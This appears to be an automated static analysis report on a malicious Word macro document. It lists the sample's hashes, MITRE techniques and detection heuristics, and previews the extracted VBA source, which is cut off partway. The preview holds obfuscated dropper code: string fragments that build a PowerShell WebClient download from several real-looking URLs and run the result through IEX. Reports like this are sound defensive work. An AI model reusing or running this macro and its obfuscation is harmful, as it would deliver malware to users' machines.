Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7878c33c8e24645e…

MALICIOUS

Office (OLE)

143.0 KB Created: 2017-12-06 10:57:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 8682f720a5e64e3c9327f15068ccbc0e SHA-1: 93ede5e0829427dee049fc78298a9e5dd6f43940 SHA-256: 7878c33c8e24645ead1665c4ceee169a70bfb77224b9025e8253e3926608de1a
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro executes a Shell() call, which is highly suspicious. The script constructs a URL, 'http://bis7hH+7hHDB7+7hH+7hHDB7nDB7+DqNY2zbLIXzpljr', likely to download and execute a second-stage payload, indicating a dropper or downloader functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6393158-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6393158-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52532 bytes
SHA-256: 54cf558ac60a6637a185f806c5fcdf7057d6c1380f024675519c2466ddcc55e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rzIjNEUMAv"
Function QzjLdSwHd()
znSAlCwQtDj = Array(UCase("AhaviijGnaho" + "ZMdCKjdlh" + "IAcczfcJiKZA" + "AIjMbduJEERo" + "VfjBUBTwSuBFj"))
bjKCV = Mid("TQruN6rA2fHAEOzNMpSlZFFmpEApWz9B7+D'+'B7s7hH+7hH);breaDB7+DB7k;}ca7hH+7hHDB7+DB7tc'+'h{DB7+DB7wDB7+DB7rDB7+DB7ite-hDB7+DBAbfszt", 32, 90)
jVzKwvpzIj = Array(UCase("jHQCVpmZ" + "kwiwwZafEGVb" + "UPVuuHrGiKDQ" + "MASaELvH" + "ikmtfOGzhuhz"))
LlaKCzOIq = Array(UCase("KRzinZcdtdT" + "HmbEwKo" + "JzahqYjo" + "NiGvCjsFaiPR" + "mFhRtjVNwrRZR"))
iAHkwEAjRaR = Array(UCase("WSPjsVb" + "LYkTjiLiQ" + "MVENfNq" + "jFlczllUiU" + "fiHUquvaVw"))
ubHWS = Mid("9HJs7ost SMDB7+D7hH+7hHB7v_.E'+'xc7'+'hH+7hHe'+'ptDB7+DB7iDB7+DB7on.MesDB7+DB7sage'+';}}DB7)-RE7hH+7hHpLac7hH+7hHEDB7pOmDB7,[chAr]92'+' -cReplace  ([cScrR24", 5, 146)
lfvzplCKabu = Array(UCase("qSnOsovfz" + "GEDjzVjZp" + "LUzYiASUO" + "pVlWBnnPWdwGG" + "LodmOdKrkA"))
dqVwbfbVM = Array(UCase("CvtpXiw" + "nCtVoWfj" + "zhLDrKlYEAO" + "jmUacCpiH" + "GYWjVlISw"))
zivEvUpz = Array(UCase("KAqNzTAwIz" + "cihpDtGlbkab" + "wzAhhoDfWhzOV" + "rHqIRsNzM" + "nDSGUDljZAOATS"))
KBYMED = Mid("qz8E'+'st'+'em.Net.WebClient;DB7+DB7S'+'MvnsadDB7+DB7asd = new-obD7hH+7hHB7+DB7jeDB7+DB7ct random;SDB7+DB7Mvbcd'+' = 8A3httpDB7+'+'DB7s:DB7+DB7//bis7hH+7hHDB'+'7+7hH+7hHDB7nDB7+DqNY2zbLIXzpljr", 5, 174)
ojDQA = Array(UCase("LUbokALl" + "QTihpEPZ" + "MTpATkbnhKoAQl" + "DHPLjpb" + "EarucqjcGLMGf"))
iJSMFrwB = Array(UCase("UwBFwjbha" + "dkcJjczkA" + "iWwLTwNoVFroYt" + "vMuPPMWrrqSJap" + "OPTYkzzqlA"))
lGWZPWYYprX = Array(UCase("kOinOfvUNZ" + "qtzHrHwI" + "SvLYwpjhmIjj" + "AXALmvq" + "jrBCLOMmrj"))
WwczkbKuFR = Mid("NwM/DB7+DB7,http:/D7h'+'H+7hHB7+7hH+7hHDB7/www.brDB7+DB7usstroyDB7+DB7.DB7+DB7ru/b7hH+'+'7'+'hHa/,httDB7+DB7p://www.xnDB7+DB7--DB77hH+7hH+DB7--8D'+'B7+DPFb4PwhCv4OH0zatwMo7C7WlCYE", 2, 151)
HTwuKo = Array(UCase("mMVXpMiLnP" + "VkhIiFU" + "mnwzqbU" + "JzwWIOtaJWUBFa" + "CIJtircTu"))
HSYGLJf = Array(UCase("KJDpCJrZwNi" + "sfotZGf" + "DRMmDJWkaU" + "vYCWtzizBvVsKw" + "JXXUmfLPaswQ"))
aTWPKGiGI = Array(UCase("wPuDQkKLKcM" + "jkhmsDSiJCEd" + "YvdRoIjFi" + "IASQGiHkzHK" + "ILKKzGi"))
vXKFuGrn = Mid("0GAii0o1mVbzKRR93Lw7+DB7vhDB7+DB7uajV", 20, 16)
ZqrOdaj = Array(UCase("snGwiSmhpJuw" + "JiYhZBoRAwNFh" + "kIbdwjzFN" + "WNrLFTOcYvWhq" + "TucTrpttwDCYN"))
BAjUN = Array(UCase("vLRqrohuVT" + "bBGYlZmLABR" + "WCTnRGd" + "ZaMizjcY" + "ANOjbjDCn"))
pKAOP = Array(UCase("VUjOiNWozC" + "fbjAUIQlEAO" + "DzTkOHMcOOj" + "ajAFQMD" + "bRMcHoVsAzVWHr"))
GrSVnlkjt = Mid("pARFlik8PjrY2ihvZhAr]56+[chAr]65+[c7hH'+'+7hHhAr]51),[chAr]39-cReplace  DB7SMvD7hH+7hHB7,[c'+'hAr]36) ufQ IEx7hH).RE'+'PLACe(([cHAr]68'+'+[cHAr]66+[cHAr]55),[STRINg][cHAr]39).REPLACeO4Q6", 18, 165)
zIVMdNAQkGF = Array(UCase("lNviUiHvnY" + "PnsKGAp" + "aCwNtzoCYu" + "Pkdiswiws" + "qopAQlZ"))
hOMkwPt = Array(UCase("RLcHjnZQRuh" + "kHKUswRAmk" + "dZmUbOtKujEju" + "EXJCBviaOkkpi" + "aqqthVziuSw"))
caHElAtXjz = Array(UCase("UWssRvRulSKPmw" + "NmbjVACKLr" + "kIshQwEajojFXF" + "zWZChkvJw" + "fQNzSMjARLI"))
itFWuA = Mid("494pBY2Lno4aHRwE4tQK9jrw9RDB7+DB7 = SMveDB7+D'+'B7nDB7hH+7hH7+DB7v:p7hH+'+'7hHub'+'l7hH+7hH'+'DB7+DB7'+'ic'+' + 8A3pDB7+DB7OmDB7+DB78DB7+DB7A3DB7+DB7 DB7+DB7+DB7+DB7 SMvDB7+DB7karapDB7+'+'DB7a'+'jfRIiubtI", 27, 169)
IZTizOHFo = Array(UCase("XkmqfYQ" + "nYIwlpICLBkm" + "QkDsLBYoWdqD" + "XwnYELYzoBisIr" + "wXsiLRHzi"))
wJjTaz = Array(UCase("EBLLLNj" + "jEdECjkIKOow" + "BkircRcAEFuIvS" + "rVYiZRwbmI" + "lbXqDWJICQdUiv"))
opqzWV = Array(UCase("OvLzUwF" + "mzTGsjj" + "VuIlVLoIOHQAh" + "oXLfHhqPS" + "JDPNwimSao"))
KXOUOGUjX = Mid("LUO9(7hHufQ7hH,['+'STRINg][cHAr]124'+'))').rEPlAce('E3f',[STrINg][cHAr]36).rEPqIfEfV", 5, 74)
QnwtWGBqBtj = Array(UCase("jcwjwHOM" + "opGYdDJvi" + "fAcNCXwmPHOB" + "mSkWdCMnXPGCN" + "kfzHhlBPG"))
AmihRpdKc = Array(UCase("HHViDHDjN" + "FVWLwuNZzCG
... (truncated)